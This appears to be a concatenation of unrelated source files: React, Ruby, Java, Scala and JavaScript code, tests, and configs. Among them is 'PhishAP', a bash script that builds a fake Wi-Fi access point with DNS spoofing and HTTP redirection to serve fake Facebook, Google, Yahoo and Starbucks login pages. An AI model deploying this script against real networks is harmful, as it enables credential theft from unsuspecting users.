            <Drawer.Navigator initialRouteName="Home" drawerContent={props => <DrawerContent {...props} />} >
              <Drawer.Screen name="HomeDrawer" component={MainTabScreen} />
              <Drawer.Screen name="SettingsScreen" component={SettingsScreen} />
            </Drawer.Navigator>
          )
          :
            <RootStackScreen />
          }
        </NavigationContainer>
      </AppProvider>
    </AuthContext.Provider>
  );
}
<filename>test/test_parse_sql.rb
require File.join(File.expand_path(File.dirname(__FILE__)), 'required_file.rb')
class TestParseSql < Test::Unit::TestCase
  # parse_sql on a single-line execute("UPDATE ...") should yield the target
  # table name and the list of assigned columns.
  def test_parse_sql
    contents = "execute \"UPDATE topics SET highest_staff_post_number = highest_post_number\""
    ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
    assert_equal ['topics', ['highest_staff_post_number']], parse_sql(ast[0][1])
  end

  # handle_cross_line_string should strip the heredoc delimiters and return the
  # SQL body. (The multi-line string contents below are kept verbatim — their
  # whitespace is part of the expected output.)
  def test_handle_cross_string
    contents = "execute <<-SQL
UPDATE email_logs
SET user_id = u.id
FROM email_logs el
LEFT JOIN users u ON u.email = el.to_address
WHERE email_logs.id = el.id
AND email_logs.user_id IS NULL
AND NOT email_logs.skipped
SQL"
    output = " UPDATE email_logs
SET user_id = u.id
FROM email_logs el
LEFT JOIN users u ON u.email = el.to_address
WHERE email_logs.id = el.id
AND email_logs.user_id IS NULL
AND NOT email_logs.skipped\n"
    ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
    sql = handle_cross_line_string(ast[0][1][0][0].source)
    assert_equal sql, output
    assert_equal ['email_logs', ['user_id']], parse_sql(ast[0][1])
  end

  # Same heredoc handling for a non-UPDATE statement (ALTER TABLE); the
  # parse_sql result here is only printed, not asserted.
  def test_handle_cross_string2
    contents = "execute <<-SQL
ALTER TABLE distributors
ADD CONSTRAINT zipchk
CHECK (char_length(zipcode) = 5) NO INHERIT;
SQL"
    output = " ALTER TABLE distributors
ADD CONSTRAINT zipchk
CHECK (char_length(zipcode) = 5) NO INHERIT;\n"
    ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
    sql = handle_cross_line_string(ast[0][1][0][0].source)
    assert_equal sql, output
    puts "parse_sql(ast[0][1]) #{parse_sql(ast[0][1])}"
  end
end
<filename>js/sykepengesoknad/utils/beregnBrodsmulesti.js<gh_stars>1-10
import { getLedetekst } from '@navikt/digisyfo-npm';
import beregnSteg, { KVITTERING } from './beregnSteg';
import { getSykefravaerUrl, getUrlTilSoknad, getUrlTilSoknader } from '../../utils/urlUtils';
/**
 * Builds the breadcrumb trail for the sykepengesøknad pages.
 * The first two crumbs are always present; the tail depends on which step
 * the given path resolves to.
 */
const beregnBrodsmulesti = (sti, id) => {
    // Crumbs common to every page.
    const dittSykefravaerSmule = {
        tittel: getLedetekst('landingsside.sidetittel'),
        sti: getSykefravaerUrl(),
        erKlikkbar: true,
    };
    const soknaderSmule = {
        tittel: 'Søknader om sykepenger',
        sti: getUrlTilSoknader(),
        erKlikkbar: true,
    };

    if (beregnSteg(sti) === KVITTERING) {
        // Receipt page: clickable link back to the søknad, plus the receipt leaf.
        const soknadSmule = {
            tittel: 'Søknad',
            sti: getUrlTilSoknad(id),
            erKlikkbar: true,
        };
        return [dittSykefravaerSmule, soknaderSmule, soknadSmule, { tittel: 'Kvittering' }];
    }

    // Any other step: the søknad itself is the (non-clickable) leaf.
    return [dittSykefravaerSmule, soknaderSmule, { tittel: 'Søknad' }];
};

export default beregnBrodsmulesti;
|
<filename>models/leave.schema.js
import mongoose from "mongoose"

/**
 * Schema for a single leave record: the kind of leave and how many days taken.
 *
 * Fix: the original passed a plain object to mongoose.model(); it is now
 * wrapped in `new mongoose.Schema(...)`, the documented contract for model().
 */
const leaveSchema = new mongoose.Schema({
    leaveType: { type: String },
    leaveTaken: { type: Number }
})

// Third argument pins the collection name to 'leave' (disables pluralisation).
export const leaveModel = mongoose.model("leave", leaveSchema, 'leave')
<filename>jframe-demo/demo-plugin/jframe-demo-elasticsearch/src/main/java/jframe/demo/elasticsearch/weike/Domain.java
package jframe.demo.elasticsearch.weike;
import java.io.Serializable;
/**
 * Marker interface for domain objects in the weike elasticsearch demo.
 * Extends {@link Serializable} so implementations can be serialized; it
 * declares no methods of its own.
 */
public interface Domain extends Serializable {
}
|
/*
* Copyright 2015-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.ui.topo;
import java.util.Collections;
import java.util.Set;
import java.util.TreeSet;
import static com.google.common.base.Preconditions.checkNotNull;
/**
* Denotes the highlighting to be applied to a link.
* {@link Flavor} is a closed set of NO-, PRIMARY-, or SECONDARY- highlighting.
* {@link Mod} is an open ended set of additional modifications (CSS classes)
* that may also be applied.
* Note that {@link #MOD_OPTICAL} and {@link #MOD_ANIMATED} are pre-defined mods.
* Label text may be set, which will also be displayed on the link.
*/
public class LinkHighlight extends AbstractHighlight {

    private static final String PLAIN = "plain";
    private static final String PRIMARY = "primary";
    private static final String SECONDARY = "secondary";
    private static final String EMPTY = "";
    private static final String SPACE = " ";

    /**
     * Denotes a link to be tagged as an optical link.
     */
    public static final Mod MOD_OPTICAL = new Mod("optical");

    /**
     * Denotes a link to be tagged with animated traffic ("marching ants").
     */
    public static final Mod MOD_ANIMATED = new Mod("animated");

    private final Flavor flavor;
    private final Set<Mod> mods = new TreeSet<>();
    private String label = EMPTY;

    /**
     * Constructs a link highlight entity.
     *
     * @param linkId identifier of the link to highlight
     * @param flavor highlighting flavor to apply (never null)
     */
    public LinkHighlight(String linkId, Flavor flavor) {
        super(TopoElementType.LINK, linkId);
        this.flavor = checkNotNull(flavor);
    }

    /**
     * Adds a highlighting modification to this link highlight.
     *
     * @param mod mod to be added (never null)
     * @return self, for chaining
     */
    public LinkHighlight addMod(Mod mod) {
        mods.add(checkNotNull(mod));
        return this;
    }

    /**
     * Sets the label text shown on the link; null clears it.
     *
     * @param label the label text
     * @return self, for chaining
     */
    public LinkHighlight setLabel(String label) {
        this.label = (label == null) ? EMPTY : label;
        return this;
    }

    /**
     * Returns the highlight flavor.
     *
     * @return highlight flavor
     */
    public Flavor flavor() {
        return flavor;
    }

    /**
     * Returns an unmodifiable view of the highlight modifications.
     *
     * @return highlight modifications
     */
    public Set<Mod> mods() {
        return Collections.unmodifiableSet(mods);
    }

    /**
     * Generates the space-separated CSS classes string: the flavor's class
     * followed by each registered mod (in the set's natural order).
     *
     * @return CSS classes string
     */
    public String cssClasses() {
        StringBuilder css = new StringBuilder(flavor.toString());
        for (Mod m : mods) {
            css.append(SPACE).append(m);
        }
        return css.toString();
    }

    /**
     * Returns the label text.
     *
     * @return label text
     */
    public String label() {
        return label;
    }

    /**
     * Link highlighting flavor; toString() yields the associated CSS class.
     */
    public enum Flavor {
        NO_HIGHLIGHT(PLAIN),
        PRIMARY_HIGHLIGHT(PRIMARY),
        SECONDARY_HIGHLIGHT(SECONDARY);

        private String cssName;

        Flavor(String s) {
            cssName = s;
        }

        @Override
        public String toString() {
            return cssName;
        }
    }
}
|
<filename>jgrapht-master/jgrapht-core/src/main/java/org/jgrapht/traverse/DegeneracyOrderingIterator.java
/*
* (C) Copyright 2017-2018, by <NAME> and Contributors.
*
* JGraphT : a free Java graph-theory library
*
* This program and the accompanying materials are dual-licensed under
* either
*
* (a) the terms of the GNU Lesser General Public License version 2.1
* as published by the Free Software Foundation, or (at your option) any
* later version.
*
* or (per the licensee's choosing)
*
* (b) the terms of the Eclipse Public License v1.0 as published by
* the Eclipse Foundation.
*/
package org.jgrapht.traverse;
import java.lang.reflect.*;
import java.util.*;
import org.jgrapht.*;
/**
* A degeneracy ordering iterator.
*
* <p>
* The degeneracy of a graph G is the smallest value d such that every nonempty subgraph of G
* contains a vertex of degree at most d. If a graph has degeneracy d, then it has a degeneracy
* ordering, an ordering such that each vertex has d or fewer neighbors that come later in the
* ordering.
*
* <p>
* The iterator crosses components but does not track them, it only tracks visited vertices.
*
* <p>
* The iterator treats the input graph as undirected even if the graph is directed. Moreover, it
* completely ignores self-loops, meaning that it operates as if self-loops do not contribute to the
* degree of a vertex.
*
* @param <V> the graph vertex type
* @param <E> the graph edge type
*
* @author <NAME>
* @since February, 2017
*/
public class DegeneracyOrderingIterator<V, E>
    extends AbstractGraphIterator<V, E>
{
    // buckets[d] holds the not-yet-returned vertices whose *current* degree is d
    private Set<V>[] buckets;
    // current (dynamically decremented) degree of each unvisited vertex
    private Map<V, Integer> degrees;
    // index of the smallest possibly non-empty bucket; only ever increases in advance()
    private int minDegree;
    // next vertex to return, pre-computed by hasNext(); null when not yet fetched
    private V cur;

    /**
     * Constructor
     *
     * @param graph the graph to be iterated
     */
    @SuppressWarnings("unchecked")
    public DegeneracyOrderingIterator(Graph<V, E> graph)
    {
        super(graph);

        /*
         * Count degrees, but skip self-loops
         */
        this.minDegree = Integer.MAX_VALUE;
        int maxDegree = 0;
        this.degrees = new HashMap<>();
        for (V v : graph.vertexSet()) {
            int d = 0;
            for (E e : graph.edgesOf(v)) {
                V u = Graphs.getOppositeVertex(graph, e, v);
                // self-loops (u == v) deliberately do not count toward the degree
                if (!v.equals(u)) {
                    d++;
                }
            }
            degrees.put(v, d);
            minDegree = Math.min(minDegree, d);
            maxDegree = Math.max(maxDegree, d);
        }
        // For an empty vertex set minDegree is still MAX_VALUE; clamp it to
        // maxDegree (0) so advance() terminates immediately.
        minDegree = Math.min(minDegree, maxDegree);

        /*
         * Create buckets
         */
        this.buckets = (Set<V>[]) Array.newInstance(Set.class, maxDegree + 1);
        for (int i = 0; i < buckets.length; i++) {
            buckets[i] = new HashSet<>();
        }
        for (V v : graph.vertexSet()) {
            buckets[degrees.get(v)].add(v);
        }
    }

    /**
     * {@inheritDoc}
     *
     * Always returns true since the iterator does not care about components.
     */
    @Override
    public boolean isCrossComponentTraversal()
    {
        return true;
    }

    /**
     * {@inheritDoc}
     *
     * Trying to disable the cross components nature of this iterator will result into throwing an
     * {@link IllegalArgumentException}.
     */
    @Override
    public void setCrossComponentTraversal(boolean crossComponentTraversal)
    {
        if (!crossComponentTraversal) {
            throw new IllegalArgumentException("Iterator is always cross-component");
        }
    }

    @Override
    public boolean hasNext()
    {
        if (cur != null) {
            return true;
        }
        // Pre-fetch the next vertex so repeated hasNext() calls are idempotent;
        // next() consumes (nulls out) cur.
        cur = advance();
        if (cur != null && nListeners != 0) {
            fireVertexTraversed(createVertexTraversalEvent(cur));
        }
        return cur != null;
    }

    @Override
    public V next()
    {
        if (!hasNext()) {
            throw new NoSuchElementException();
        }
        V result = cur;
        cur = null;
        if (nListeners != 0) {
            fireVertexFinished(createVertexTraversalEvent(result));
        }
        return result;
    }

    // Removes and returns a vertex of minimum current degree, updating the
    // degrees and buckets of its unvisited neighbors; returns null when done.
    private V advance()
    {
        // Skip empty buckets. minDegree never needs to decrease: a neighbor's
        // degree is only decremented when it is strictly above minDegree.
        while (minDegree < buckets.length && buckets[minDegree].isEmpty()) {
            minDegree++;
        }
        V result = null;
        if (minDegree < buckets.length) {
            Set<V> b = buckets[minDegree];
            V v = b.iterator().next();
            b.remove(v);
            // removal from `degrees` marks v as visited
            degrees.remove(v);

            for (E e : graph.edgesOf(v)) {
                V u = Graphs.getOppositeVertex(graph, e, v);
                if (v.equals(u)) {
                    // ignore self-loop
                    continue;
                }
                if (degrees.containsKey(u)) {
                    int uDegree = degrees.get(u);
                    // only decrement while above minDegree, preserving the
                    // invariant that no bucket below minDegree is non-empty
                    if (uDegree > minDegree) {
                        buckets[uDegree].remove(u);
                        uDegree--;
                        degrees.put(u, uDegree);
                        buckets[uDegree].add(u);
                    }
                }
            }
            result = v;
        }
        return result;
    }
}
|
#!/bin/bash
# Build the CentOS 6 image and capture the complete build output via script(1).
set -eux
image_name=kiyoad/wb_centos6
# Date stamp (YYYYMMDD) used to name the build log file.
id=$(date '+%Y%m%d')
# -a appends to the log, -c runs the given command instead of a shell.
script -ac "docker build -t ${image_name} -f Dockerfile.centos6 ." docker_build_centos6_${id}.log
|
<filename>packages/app/src/components/VisualizationOptions/__tests__/CheckboxBaseOption.spec.js
import React from 'react'
import { shallow } from 'enzyme'
import { Checkbox } from '@dhis2/ui'
import { CheckboxBaseOption } from '../Options/CheckboxBaseOption'
describe('DV > Options > CheckboxBaseOption', () => {
let props
let shallowCheckboxBaseOption
let onChange
const checkboxBaseOption = props => {
shallowCheckboxBaseOption = shallow(<CheckboxBaseOption {...props} />)
return shallowCheckboxBaseOption
}
beforeEach(() => {
onChange = jest.fn()
props = {
value: false,
label: 'text',
option: { name: 'checkbox1' },
onChange,
}
shallowCheckboxBaseOption = undefined
})
it('renders a label for checkbox', () => {
expect(checkboxBaseOption(props).find(Checkbox).props().label).toEqual(
props.label
)
})
it('renders the checkbox with the correct checked state', () => {
expect(checkboxBaseOption(props).find(Checkbox).props().checked).toBe(
props.value
)
})
it('should trigger the onChange callback on checkbox change', () => {
const checkbox = checkboxBaseOption(props).find(Checkbox)
checkbox.simulate('change', { checked: true })
expect(onChange).toHaveBeenCalled()
})
})
|
const crypto = require('crypto');

// In-memory session store; new sessions are appended at the end.
let sessions = [];

// Sweep frequency for expired sessions, from env (minutes -> ms).
// NOTE(review): if FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MINS is unset this is
// NaN and setInterval will fall back to its minimum delay — confirm the env
// var is always provided.
const FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MILLI = process.env.FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MINS * 60 * 1000;
setInterval(removeExpiredSessions, FILES_REMOVE_EXPIRED_SESSIONS_FREQ_MILLI);

// Role constants used by authInspector and session creation.
const ROLE = {
    ADMIN: 'admin',
    USER: 'user',
    INVITEE: 'invitee'
}
// admin can do anything, so calling authInspector() implies only admin can do the action
function authInspector(...permittedRoles) {
    return (req, res, next) => {
        const session = isSessionValid(req.get('Authorization'), permittedRoles);
        if (!session) {
            // Challenge the client and reject the request.
            res.set('WWW-Authenticate', 'xBasic realm="files"');
            return res.sendStatus(401);
        }
        // Expose the authenticated identity to downstream handlers via headers.
        req.headers['Role'] = session.role;
        req.headers['Username'] = session.username;
        if (session.role === ROLE.INVITEE) {
            // Invitees carry extra per-invite limits.
            req.headers['MaxUploadSize'] = session.invite.maxUploadSize;
            req.headers['ExpirationDate'] = session.invite.expirationDate;
        }
        next();
    };
}
/** Returns the authorization string */
function createNewSession(username, role, invite=undefined) {
    // 16 random bytes -> 32 hex chars, used as the bearer token.
    const authorization = crypto.randomBytes(16).toString('hex');
    sessions.push({
        username,
        role,
        creationDate: new Date(),
        authorization,
        invite,
    });
    return authorization;
}
// Session lifetime, from env (minutes -> ms).
const FILES_SESSION_VALIDITY_DURATION_MILLI = process.env.FILES_SESSION_VALIDITY_DURATION_MINS * 60 * 1000;

// Returns session if session valid. False if session invalid
// Side effect: if the matching session has expired, it is removed here.
function isSessionValid(authorization, permittedRoles) {
    if (!authorization) return false
    let currentDate = new Date();
    for (let i = sessions.length-1; i >= 0; i--) { // Count down for efficiency since new sessions are appended to sessions array
        if ((currentDate - sessions[i].creationDate) <= FILES_SESSION_VALIDITY_DURATION_MILLI) {
            if(sessions[i].authorization === authorization) {
                // Admins pass regardless of the permitted-roles list.
                if (sessions[i].role === ROLE.ADMIN) {
                    return sessions[i];
                } else {
                    for (const permittedRole of permittedRoles) {
                        if (sessions[i].role === permittedRole) {
                            return sessions[i];
                        }
                    }
                    // Valid token but role not permitted for this action.
                    return false;
                }
            }
        } else {
            // Session is expired; if it is the one being presented, drop it.
            if(sessions[i].authorization === authorization) {
                sessions.splice(i, 1); // removes 1 element starting at index i
                return false;
            }
        }
    }
    return false;
}
// Periodic sweep: drops every session older than the configured validity window.
function removeExpiredSessions() {
    const currentDate = new Date();
    // BUG FIX 1: iterate backwards — splicing while counting up skipped the
    // element that shifted into the removed slot.
    // BUG FIX 2: compare against FILES_SESSION_VALIDITY_DURATION_MILLI instead
    // of a hardcoded 4000 ms, matching the expiry check in isSessionValid().
    for (let i = sessions.length - 1; i >= 0; i--) {
        if ((currentDate - sessions[i].creationDate) > FILES_SESSION_VALIDITY_DURATION_MILLI) {
            sessions.splice(i, 1); // removes 1 element starting at index i
        }
    }
}
module.exports = { authInspector, createNewSession, ROLE } |
#!/usr/bin/env bash
#--------------------------------
# NO PASSWORD IS DISPLAYED!!!!
# FOR EDUCATIONAL PURPOSES ONLY!
#--------------------------------
CLEAN="\033[0m"
RED='\033[01;31m'
YELLOW='\033[01;33m'
WHITE='\033[01;37m'
GREEN='\033[01;32m'
BOLD='\033[1m'
if [ "$EUID" -ne 0 ]
then printf "${RED}[-]${CLEAN} Please, run as root\n"
exit
fi
if ! hash airbase-ng 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install airbase-ng\n"; exit 3
fi
if ! hash dnsmasq 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install dnsmasq\n"; exit 3
fi
if ! hash xterm 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install xterm\n"; exit 3
fi
if ! hash python3 2>/dev/null; then
printf "${RED}[-]${CLEAN} Please, install python3\n"; exit 3
fi
#Create dnsmasq config file
makeconf() {
printf "interface=at0\n" >> conf/dnsmasq.conf
printf "dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h\n" >> conf/dnsmasq.conf
printf "dhcp-option=3,10.0.0.1\n" >> conf/dnsmasq.conf
printf "dhcp-option=6,10.0.0.1\n" >> conf/dnsmasq.conf
printf "server=8.8.8.8\n" >> conf/dnsmasq.conf
printf "log-queries\n" >> conf/dnsmasq.conf
printf "log-dhcp\n" >> conf/dnsmasq.conf
printf "address=/#/10.0.0.1\n" >> conf/dnsmasq.conf
}
FILE=conf/dnsmasq.conf
if [ ! -f "$FILE" ]; then
makeconf
fi
monitor() {
printf "\n${YELLOW}[*]${CLEAN} Starting monitor mode...\n"
ifconfig $iface down > /dev/null 2>&1
iwconfig $iface mode monitor > /dev/null 2>&1
ifconfig $iface up > /dev/null 2>&1
sleep 2
printf "${GREEN}[+]${CLEAN} Monitor mode... ${GREEN}OK${CLEAN}\n\n"
}
config() {
ifconfig at0 up #up interface
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #set gateway
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #create the route
iptables -P FORWARD ACCEPT #enable forward
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 #redirect http req to gateway
echo "1" > /proc/sys/net/ipv4/ip_forward #enable forward
}
fake_ap() {
echo -e "${YELLOW}[*]${CLEAN} Creating Fake-Ap network..."
xterm -geometry "95x15-0+0" -bg black -fg green -title "FAKE-AP - PhishAP" -e zsh -c "airbase-ng $iface -e "$essid"" > /dev/null 2>&1 &
echo -e "${GREEN}[+]${CLEAN} Fake AP... ${GREEN}OK${CLEAN}\n"
sleep 3
config
printf "${YELLOW}[*]${CLEAN} Starting DNSMasq...\n"
sleep 3
pkill dnsmasq
xterm -geometry "95x19-0+230" -bg black -fg yellow -title "DNSMASQ - PhishAP" -e zsh -c "dnsmasq -C conf/dnsmasq.conf -d" > /dev/null 2>&1 &
xterm -geometry "95x15-0+550" -bg black -fg red -title "DNSSPOOF - PhishAP" -e zsh -c "dnsspoof -i at0" > /dev/null 2>&1 &
echo -e "${GREEN}[+]${CLEAN} DNSMasq... ${GREEN}OK${CLEAN}\n"
}
http_server() {
printf "${YELLOW}[?]${CLEAN} - Choose your fake page\n\n"
printf "${YELLOW}[*]${CLEAN} 1 - Facebook Login\n"
printf "${YELLOW}[*]${CLEAN} 2 - Google Login\n"
printf "${YELLOW}[*]${CLEAN} 3 - Yahoo Login\n"
printf "${YELLOW}[*]${CLEAN} 4 - Starbucks Login\n\n"
prompt="Pick an option:"
options=("1" "2" "3" "4") > /dev/null 2>&1 &
PS3="$prompt "
select opt in "${options[@]}" "Quit"; do
case "$REPLY" in
1) python3 -m http.server 80 -d templates/facebook-login/;;
2) python3 -m http.server 80 -d templates/google-login/;;
3) python3 -m http.server 80 -d templates/yahoo-login/;;
4) python3 -m http.server 80 -d templates/starbucks-login/;;
$((${#options[@]}+1))) echo "${GREEN}[!]${CLEAN} Goodbye!"; break;;
*) printf "${RED}[-]${CLEAN} Invalid option. Try another one.";continue;;
esac
done
}
banner() {
clear
echo -e "${BOLD} _ _ ___ _______ ___ ${CLEAN}"
echo -e "${BOLD} | | _ | || | | || | ${CLEAN}"
echo -e "${BOLD} | || || || | ____ | ___|| | ${CLEAN}${YELLOW}PhishAP - Fake-AP Creator${CLEAN}"
echo -e "${BOLD} | || | |____| | |___ | | ${CLEAN}${YELLOW}Version 1.0${CLEAN}"
echo -e "${BOLD} | || | | ___|| | ${CLEAN}${YELLOW}xpsecsecurity.com${CLEAN}"
echo -e "${BOLD} | _ || | | | | | ${CLEAN}"
echo -e "${BOLD} |__| |__||___| |___| |___| ${CLEAN}"
printf "\n\n"
}
main() {
airmon-ng
printf "${YELLOW}[*]${CLEAN} Set your Wi-Fi interface: "
read iface
printf "${YELLOW}[*]${CLEAN} Fake-AP name: "
read essid
banner
monitor
fake_ap
http_server
}
banner
main
|
<reponame>uwap/BahnhofsAbfahrten
// @flow
import { Actions } from 'client/actions/config';
import { type ActionType, handleActions } from 'redux-actions';
import { defaultConfig, setCookieOptions } from 'client/util';
import Cookies from 'universal-cookie';
// Shape of the config reducer state (Flow exact object type — every field required).
export type State = {|
  cookies: Cookies,
  open: boolean,
  config: marudorConfig,
  online: boolean,
|};

// Initial state: fresh cookie jar, menu closed, default config, assumed online.
const defaultState: State = {
  cookies: new Cookies(),
  open: false,
  config: defaultConfig,
  online: true,
};
export default handleActions<State, *>(
{
[String(Actions.setOnline)]: (state: State, { payload }: ActionType<typeof Actions.setOnline>) => ({
...state,
online: payload,
}),
[String(Actions.setCookies)]: (state: State, { payload }: ActionType<typeof Actions.setCookies>) => ({
open: false,
config: {
...defaultConfig,
...payload.get('config'),
},
cookies: payload,
}),
[String(Actions.setMenu)]: (state: State, { payload }: ActionType<typeof Actions.setMenu>) => ({
...state,
open: payload,
}),
[String(Actions.setConfig)]: (state: State, { payload: { key, value } }: ActionType<typeof Actions.setConfig>) => {
const newState = {
...state,
config: {
...state.config,
[key]: value,
},
};
state.cookies.set('config', newState.config, setCookieOptions);
return newState;
},
},
defaultState
);
|
// Convert a number to its binary (base-2) string representation.
const toBin = (num) => num.toString(2);

console.log(toBin(10)); // 1010
<filename>src/config/mail.js
/**
 * @author: <NAME> <<EMAIL>>
 * @description: Configuration for App Email tests with mailtrap.io
 */
// Nodemailer-style transport settings pointing at the mailtrap.io sandbox SMTP.
export default {
  host: 'smtp.mailtrap.io',
  port: 2525,
  // secure: false — no implicit TLS on port 2525.
  secure: false,
  auth: {
    user: 'cfffd6667b5174',
    // Placeholder credential — injected/redacted; never commit the real value.
    pass: '<PASSWORD>'
  },
  default: {
    // Default "From" header for outgoing notifications.
    from: 'FastFeet Notification <<EMAIL>>'
  }
};
|
package org.jeecg.modules.device.service;
import com.ciat.bim.server.dao.ToData;
import com.github.jeffreyning.mybatisplus.service.IMppService;
import org.apache.poi.ss.formula.functions.T;
import org.jeecg.modules.device.entity.TsKvLatest;
import com.baomidou.mybatisplus.extension.service.IService;
import java.util.List;
/**
 * @Description: Latest telemetry data (key/value) service.
 * @Author: jeecg-boot
 * @Date: 2022-02-16
 * @Version: V1.0
 */
public interface ITsKvLatestService extends IMppService<TsKvLatest> {

    /** Returns all telemetry keys present for the given entity ids. */
    List<String> findAllKeysByEntityIds(List<String> collect);

    /** Returns the telemetry keys available for the given tenant id. */
    List<String> getKeysByTenantId(String id);

    /**
     * Returns telemetry keys filtered by device profile.
     * NOTE(review): parameter semantics are not visible here — presumably
     * (tenantId, deviceProfileId); confirm against the implementation.
     */
    List<String> getKeysByDeviceProfileId(String id, String id1);

    /** Returns the latest key/value rows stored for the given entity id. */
    List<TsKvLatest> findAllByEntityId(String id);
}
|
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package binarytree;
/**
*
* @author jeff
*/
public class BinaryTree {

    Nodo root;

    /**
     * Inserts a value into the tree; duplicate values are ignored.
     *
     * @param valor value to insert
     */
    public void add(int valor) {
        root = addRecursivo(root, valor);
    }

    // Recursive insertion helper: returns the (possibly new) subtree root.
    private Nodo addRecursivo(Nodo actual, int valor) {
        if (actual == null) {
            return new Nodo(valor);
        }
        if (valor < actual.valor) {
            actual.izquierda = addRecursivo(actual.izquierda, valor);
        } else if (valor > actual.valor) {
            actual.derecha = addRecursivo(actual.derecha, valor);
        }
        // Equal value: already present, nothing to change.
        return actual;
    }

    /** Prints the subtree in pre-order (node, left, right). */
    public void preOrden(Nodo nodo) {
        if (nodo != null) {
            System.out.print(" " + nodo.valor);
            preOrden(nodo.izquierda);
            preOrden(nodo.derecha);
        }
    }

    /** Prints the subtree in post-order (left, right, node). */
    public void postOrden(Nodo nodo) {
        if (nodo != null) {
            postOrden(nodo.izquierda);
            postOrden(nodo.derecha);
            System.out.print(" " + nodo.valor);
        }
    }

    /** Prints the subtree in-order (ascending values). */
    public void inOrden(Nodo nodo) {
        if (nodo != null) {
            inOrden(nodo.izquierda);
            System.out.print(" " + nodo.valor);
            inOrden(nodo.derecha);
        }
    }

    /**
     * Removes a value from the tree, if present.
     *
     * @param valor value to remove
     */
    public void delete(int valor) {
        // BUG FIX: the returned subtree root must be assigned back to `root`;
        // previously the result was discarded, so deleting the root node
        // (or the last remaining node) silently had no effect.
        root = deleteRecursivo(root, valor);
    }

    // Recursive deletion helper: returns the new root of the subtree.
    private Nodo deleteRecursivo(Nodo actual, int valor) {
        if (actual == null) {
            return null;
        }
        if (valor == actual.valor) {
            // Leaf node: simply remove it.
            if (actual.izquierda == null && actual.derecha == null) {
                return null;
            }
            // One child: splice the child into the parent link.
            if (actual.derecha == null) {
                return actual.izquierda;
            }
            if (actual.izquierda == null) {
                return actual.derecha;
            }
            // Two children: replace this node's value with its in-order
            // successor (smallest value in the right subtree), then delete
            // that successor from the right subtree.
            int valorMasPequeno = encuentraValorMasPequeno(actual.derecha);
            actual.valor = valorMasPequeno;
            actual.derecha = deleteRecursivo(actual.derecha, valorMasPequeno);
            return actual;
        }
        if (valor < actual.valor) {
            actual.izquierda = deleteRecursivo(actual.izquierda, valor);
            return actual;
        }
        actual.derecha = deleteRecursivo(actual.derecha, valor);
        return actual;
    }

    // Returns the smallest value in the given subtree (its leftmost node).
    private int encuentraValorMasPequeno(Nodo root) {
        return root.izquierda == null ? root.valor : encuentraValorMasPequeno(root.izquierda);
    }

    /**
     * Returns true if the value exists in the subtree rooted at {@code actual}.
     *
     * @param actual subtree root to search from
     * @param valor  value to look for
     * @return true when found, false otherwise
     */
    public boolean contieneNodoRecursivo(Nodo actual, int valor) {
        if (actual == null) {
            return false;
        }
        if (valor == actual.valor) {
            return true;
        }
        if (valor < actual.valor) {
            return contieneNodoRecursivo(actual.izquierda, valor);
        }
        return contieneNodoRecursivo(actual.derecha, valor);
    }
}
|
<filename>tests/shared/src/main/scala/caseapp/demo/ManualCommandNotAdtOptions.scala
package caseapp.demo
import caseapp.{ArgsName, ProgName}
// Option case classes for manually-wired (non-ADT) sub-commands.
object ManualCommandNotAdtOptions {

  // Options for sub-command "c1"; trailing arguments are labelled "c1-stuff".
  @ProgName("c1")
  @ArgsName("c1-stuff")
  final case class Command1Opts(s: String)

  // Options for sub-command "c2".
  @ProgName("c2")
  final case class Command2Opts(b: Boolean)

  // Options for sub-command "c3"; `n` defaults to 2.
  @ProgName("c3")
  final case class Command3Opts(n: Int = 2)
}
|
<gh_stars>0
const { Agent, api, db, util } = require('../lib')
// API checks for database endpoints without a valid organization/auth context.
describe('db-noauth', function () {
  let agent

  before(function () {
    agent = new Agent()
    // Change the organization name to trigger unknown organization errors.
    agent.orgName = util.randomString()
  })

  it('fails exists with bad parameter value', async function () {
    await db.exists(agent, { query: {} }).fails()
  })

  it('fails exists with bad parameter type', async function () {
    await db.exists(agent, { query: { exists: 5 } }).fails()
  })

  it('fails exists with unknown database', async function () {
    await db.exists(agent).notFound()
  })

  describe('fails create with missing label', function () {
    // Request bodies that are valid JSON but lack the mandatory "label" field.
    const parts = [
      '{}',
      '{"comment":"We test a non-empty comment string here."}',
    ]
    for (const bodyString of parts) {
      it(bodyString, async function () {
        await db.create(agent, { bodyString }).fails(api.error.missingParameter('label'))
      })
    }
  })

  it('fails create with invalid JSON', async function () {
    const bodyString = "{X{'''"
    await db
      .create(agent, { bodyString })
      .unverified()
      .then(api.response.verify(api.response.invalidJSON(bodyString)))
  })

  it('fails create with duplicate field (#603)', async function () {
    // Duplicate "comment" key in the JSON body must be rejected.
    const bodyString = '{"comment":"c","comment":"c","label":"l"}'
    await db
      .create(agent, { bodyString })
      .unverified()
      .then(api.response.verify(api.response.duplicateField))
  })

  it('fails create with unknown organization', async function () {
    await db.create(agent).notFound(api.error.unknownOrganization(agent.orgName))
  })

  it('fails delete with unknown organization', async function () {
    await db.delete(agent).notFound(api.error.unknownOrganization(agent.orgName))
  })
})
|
import requests

# api-endpoint
URL = "http://www.marketwatch.com/investing/stock/AAPL"

# sending get request and saving the response as response object
r = requests.get(url = URL)

# extracting data in json format
# NOTE(review): this URL serves an HTML page, not JSON — r.json() will most
